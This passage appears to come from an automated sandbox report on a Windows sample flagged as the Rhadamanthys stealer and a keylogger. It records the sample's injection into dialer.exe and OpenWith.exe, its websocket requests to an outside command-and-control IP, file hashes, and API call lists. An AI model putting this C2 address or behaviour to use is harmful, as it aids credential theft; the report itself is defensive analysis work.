                      Sec-Websocket-Key: oqscagi87YhXdh9
                      2024-05-23 18:16:58 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:58 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:58 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.6 | 49723 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:17:04 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: IDbbhmNh0FLcLVU
                      2024-05-23 18:17:04 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:17:04 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:17:04 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Target ID:0
                      Start time:14:14:58
                      Start date:23/05/2024
                      Path:C:\Users\user\Desktop\wdeeFKntav.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\wdeeFKntav.exe"
                      Imagebase:0xc70000
                      File size:447'488 bytes
                      MD5 hash:E1BECE7BA20DBB8100100F8CFF2C415D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:14:15:03
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\dialer.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\system32\dialer.exe"
                      Imagebase:0x610000
                      File size:32'256 bytes
                      MD5 hash:E4BD77FB64DDE78F1A95ECE09F6A9B85
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:true

                      Target ID:3
                      Start time:14:15:15
                      Start date:23/05/2024
                      Path:C:\Windows\System32\OpenWith.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\openwith.exe"
                      Imagebase:0x7ff7f2200000
                      File size:123'984 bytes
                      MD5 hash:E4A834784FA08C17D47A1E72429C5109
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:false

                        Execution Graph

                        Execution Coverage:2.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:45.2%
                        Total number of Nodes:42
                        Total number of Limit Nodes:1

                        Control-flow Graph

                        APIs
                        • HeapCreate.KERNELBASE(00000000,00100000,01000000,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0AAF
                        • HeapAlloc.KERNEL32 ref: 00CC0AF7
                        • GetModuleHandleA.KERNEL32(00000000), ref: 00CC0B09
                        • HeapAlloc.KERNEL32(00000000,00000008,0004B000), ref: 00CC0B21
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CC0B2E
                          • Part of subcall function 00CC0E50: GetProcessHeap.KERNEL32(00000000,3B9ACA00,00000000,77355E70,00000000,00000000), ref: 00CC0E67
                          • Part of subcall function 00CC0E50: RtlAllocateHeap.NTDLL(00000000), ref: 00CC0E6A
                          • Part of subcall function 00CC0E50: memset.MSVCRT ref: 00CC0E85
                          • Part of subcall function 00CC0E50: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CC0E99
                          • Part of subcall function 00CC0E50: wcsrchr.MSVCRT ref: 00CC0EAE
                          • Part of subcall function 00CC0E50: wcschr.MSVCRT ref: 00CC0EC3
                          • Part of subcall function 00CC0E50: lstrlenW.KERNEL32(-00000002), ref: 00CC0ED8
                          • Part of subcall function 00CC0E50: memset.MSVCRT ref: 00CC0EF2
                          • Part of subcall function 00CC0E50: wcschr.MSVCRT ref: 00CC0F3B
                        • HeapAlloc.KERNEL32(?,00000008,00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0), ref: 00CC0C0D
                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02), ref: 00CC0CD8
                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0CDF
                        • memcpy.MSVCRT ref: 00CC0D03
                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02), ref: 00CC0D1A
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0D21
                        • memcpy.MSVCRT ref: 00CC0D41
                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0), ref: 00CC0DAA
                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000), ref: 00CC0DBC
                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00CC0FEE,00CC0A02,00CD20E0,00CC0A02,00000000,?,0000000A), ref: 00CC0DC5
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CC0E11
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00CC0E16
                        • HeapFree.KERNEL32(00000000), ref: 00CC0E1D
                        • HeapDestroy.KERNELBASE(0000003C), ref: 00CC0E35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2114201513.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2114189080.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114231770.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114246339.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114260102.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess$Free$AllocateCreateModulememcpymemsetwcschr$ChangeCloseDestroyEventFileFindHandleNameNotificationObjectSingleVirtualWaitlstrlenwcsrchr
                        • String ID: 0/#v
                        • API String ID: 1416928203-3853616392
                        • Opcode ID: e28ab7b9ddf81275af0709105827c14a9a4ad7cbfd010e32d0268b30110103cc
                        • Instruction ID: b1af3064125293405db1cbe933a41c808026e89343eb427bb0509392cfc2c298
                        • Opcode Fuzzy Hash: e28ab7b9ddf81275af0709105827c14a9a4ad7cbfd010e32d0268b30110103cc
                        • Instruction Fuzzy Hash: 76B18770A04345DBDB24DFA8CC44B2ABBE5BB98304F14892EF99A87291DB70E944CB51

                        Control-flow Graph

                        APIs
                        • GetProcessHeap.KERNEL32(00000000,3B9ACA00,00000000,77355E70,00000000,00000000), ref: 00CC0E67
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CC0E6A
                        • memset.MSVCRT ref: 00CC0E85
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CC0E99
                        • wcsrchr.MSVCRT ref: 00CC0EAE
                        • wcschr.MSVCRT ref: 00CC0EC3
                        • lstrlenW.KERNEL32(-00000002), ref: 00CC0ED8
                        • memset.MSVCRT ref: 00CC0EF2
                        • wcschr.MSVCRT ref: 00CC0F3B
                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00CC0F73
                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CC0F91
                        • MulDiv.KERNEL32(00000001,80000000,80000000), ref: 00CC0FA3
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CC0FC1
                        • HeapFree.KERNEL32(00000000), ref: 00CC0FC4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2114201513.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2114189080.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114231770.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114246339.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114260102.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Heap$Free$Processmemsetwcschr$AllocateFileModuleNamelstrlenwcsrchr
                        • String ID:
                        • API String ID: 2120544777-0
                        • Opcode ID: 74c4977c3a8c28c2b484890788ac5973896c350b7fae32537a37b4b4789655cc
                        • Instruction ID: 2a16a421725601959aa22796231f1d26b70c6b495ad57fbbcf4fbc932e191754
                        • Opcode Fuzzy Hash: 74c4977c3a8c28c2b484890788ac5973896c350b7fae32537a37b4b4789655cc
                        • Instruction Fuzzy Hash: 1B412631A0030597E730A7A4EC85FBE73A8EB85751F24002FFE05D61C1EA69EA85C271

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2114201513.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2114189080.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114231770.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114246339.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2114260102.0000000000CDB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                        • String ID:
                        • API String ID: 801014965-0
                        • Opcode ID: c591d708b08f0897b8ec15a5cffd47e08d1ff9bb0ef82714b3fa6fe5c0028ade
                        • Instruction ID: ba4eab9a2a0f1ca92ab512f4fc005a18d9cca64520bb280d0063adf4d1b844f4
                        • Opcode Fuzzy Hash: c591d708b08f0897b8ec15a5cffd47e08d1ff9bb0ef82714b3fa6fe5c0028ade
                        • Instruction Fuzzy Hash: 8C417CB1C41348EFDB209FA5D885FAD7BB8FB09710F20411FE952972A2C7746981DB62
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00CC2311
                          • Part of subcall function 00CC2098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00CC20C1
                          • Part of subcall function 00CC2098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CC226D
                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00CC2363
                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00CC23BD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CC23F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.2110158241.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_cc2000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Virtual$Alloc$Free$Protect
                        • String ID: ,
                        • API String ID: 1004437363-3772416878
                        • Opcode ID: 15a4efe748f616053fe8ffffddab00f5333e8782292edb7e0670b88d1d28ae77
                        • Instruction ID: 09cc49fb5e65558f98019264dd19f5591ddff527570cbe22dbb585023ad58d92
                        • Opcode Fuzzy Hash: 15a4efe748f616053fe8ffffddab00f5333e8782292edb7e0670b88d1d28ae77
                        • Instruction Fuzzy Hash: C741F875900709AFCB10DFA9C881F9EBBB8FF08354F14851AF969A7240D370EA54CBA4
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00CC20C1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CC226D
                        Memory Dump Source
                        • Source File: 00000000.00000003.2110158241.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_cc2000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction ID: 868c4ea68bc6458be08ce0a326da2c23779969c7c061e6ccf22067131941b16a
                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction Fuzzy Hash: E0718B71E04249DFDB41CF98C981BEEBBF0AF09314F284099E565FB241C634AA91DF64
                        Memory Dump Source
                        • Source File: 00000000.00000003.2110158241.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_cc2000_wdeeFKntav.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                        • Instruction ID: 61875d35c57966bba7f8bd0d80126f0b3e129b8ec39b0b668c9cc724b8b36fd6
                        • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                        • Instruction Fuzzy Hash: 13F09079A00200CFCB24CF0AC548E95B7F6FB8573076545A9E415DB321D3B0EE44DBA1
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 0272031C
                          • Part of subcall function 027200A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027200C9
                          • Part of subcall function 027200A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720275
                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 0272036E
                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027203DD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027203FD
                        • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02720424
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0272044C
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 02720467
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000003.2114114351.0000000002720000.00000040.00000001.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_3_2720000_dialer.jbxd
                        Similarity
                        • API ID: Virtual$Alloc$Free$ChangeCloseFileFindNotificationProtectView
                        • String ID: ,
                        • API String ID: 2870039258-3772416878
                        • Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                        • Instruction ID: 92fb205c863a04c0b385a2691c013a983ea9b71f6f6dd6c2f6ddf9602ac2aaea
                        • Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                        • Instruction Fuzzy Hash: 27510BB5900219EFDB20DFA5C984A9EBBB9FF18354F10C42AF959A7241D770AA44CF60
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027200C9
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720275
                        Memory Dump Source
                        • Source File: 00000002.00000003.2114114351.0000000002720000.00000040.00000001.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_3_2720000_dialer.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction ID: 639df81952aaa51664d81891f360d90d93260b0d6c343cc692efe07cf0d2ec36
                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction Fuzzy Hash: 0B718971E0425ADFDB41CF98C981BEEBBF0AB19314F284096E465FB241C334AA95CF64

                        Execution Graph

                        Execution Coverage:4.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:21.7%
                        Total number of Nodes:429
                        Total number of Limit Nodes:43

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPathPort$??3@NameName__malloc_dbg
                        • String ID: $0$@
                        • API String ID: 4066683456-2347541974
                        • Opcode ID: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
                        • Instruction ID: 3b305061e58e19c5dc1f9014f45e8d81b367445f22d5454e64f79c7a9187bbac
                        • Opcode Fuzzy Hash: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
                        • Instruction Fuzzy Hash: 62515170528B888FD764DF18D4857AA7BF0FF8A314F60452EE48FC6251DBB4A4858B93
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000003.2278231695.0000025B16820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B16820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_3_25b16820000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
                        • String ID:
                        • API String ID: 3472209132-0
                        • Opcode ID: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
                        • Instruction ID: 81ecfaa18c40a3ba5125cbb705f5ad14c5d48ed68bc10589262311d88467c72e
                        • Opcode Fuzzy Hash: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
                        • Instruction Fuzzy Hash: 58C16370218F098BDB99EF28C499B69B7E1FB98311F00852EE48EC7656DF34E845C785

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort_calloc_dbg
                        • String ID: $0$@
                        • API String ID: 3053611130-2347541974
                        • Opcode ID: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
                        • Instruction ID: bec641e8bc709a4b2767b166229aefbe6d6482b77c6f451b06020800090fc82a
                        • Opcode Fuzzy Hash: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
                        • Instruction Fuzzy Hash: D4514B3060CB898FE764DB58D8847ABBBE5FF95351F10052EA48EC3260DBB4E4458B52

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptAllocateChangeCloseConnectFindHeapNotificationPort
                        • String ID:
                        • API String ID: 3171316915-0
                        • Opcode ID: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
                        • Instruction ID: debff9680ff50cb907f76ceb73fd8d86eb9ec57441230a5c21eb03bc985f3583
                        • Opcode Fuzzy Hash: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
                        • Instruction Fuzzy Hash: 3A91D631508E088FDBA9EF18C895FE5B7E1FB88311F14865AD49FC3196DB34E9428789

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort$ExceptionHandlerMitigationPolicyProcessVectored
                        • String ID:
                        • API String ID: 1453854198-0
                        • Opcode ID: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
                        • Instruction ID: cbee6c07ba73ff1d36649bd911dbfbb00c0239f0a3b19900a3f034b6294cec09
                        • Opcode Fuzzy Hash: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
                        • Instruction Fuzzy Hash: 7D41E130208F488FDB59DF2C8889B957B91EB59320F04439EE95ECB2C7DA34C9058799

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                        • String ID:
                        • API String ID: 2502124517-0
                        • Opcode ID: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
                        • Instruction ID: 97dd9d43e3d3b424bd3ddad6f3fb4fa9bd64db177be7802468048b463773715a
                        • Opcode Fuzzy Hash: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
                        • Instruction Fuzzy Hash: C631A230608A498FE794DF28D8887AA7BE0FF94320F50463ED45BC3195DB38D846C791

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@_calloc_dbg_malloc_dbg
                        • String ID:
                        • API String ID: 2766757376-0
                        • Opcode ID: 6d91b1f4bef4ac05faf3d87a6c08fb192cea63226e2e58e6cafd0a6581730c4f
                        • Instruction ID: 9b614231cfb528f78db2b30316a76aba82e12d2c1d46e7a363ad75e86b2b89a6
                        • Opcode Fuzzy Hash: 6d91b1f4bef4ac05faf3d87a6c08fb192cea63226e2e58e6cafd0a6581730c4f
                        • Instruction Fuzzy Hash: 36423F70518F888FEB95EF28D885A9AB7E1FF58710F20462AD04FC7252EF34A545CB91

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
                        • Instruction ID: 211cfc43ecd35a96832299cc3e3289dcb4d79dd130c818f69a316a7a6020643d
                        • Opcode Fuzzy Hash: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
                        • Instruction Fuzzy Hash: 2F219831B1CBC84FD750AF58848475A76E0FF99321F60053FE44EC32A0D6B8A8858751

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
                        • Instruction ID: 611e43c0066618ee21a760c9cd941722b02d69fce5f6e45989de50731340d750
                        • Opcode Fuzzy Hash: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
                        • Instruction Fuzzy Hash: 7321A771B08AC84FDB509A9884C4A2E7AE4FF9A361F60053FE54FC3260D6B8A9C58751

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0

                        Control-flow Graph

                        APIs
                        • socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF41F0815D9), ref: 00007DF41F0814E5
                          • Part of subcall function 00007DF41F0810C8: ioctlsocket.WS2_32 ref: 00007DF41F0810F4
                        • bind.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF41F0815D9), ref: 00007DF41F08156A
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: bindioctlsocketsocket
                        • String ID:
                        • API String ID: 3555158474-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort
                        • String ID:
                        • API String ID: 1658770261-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Recv
                        • String ID:
                        • API String ID: 4192927123-0
                        APIs
                        Memory Dump Source
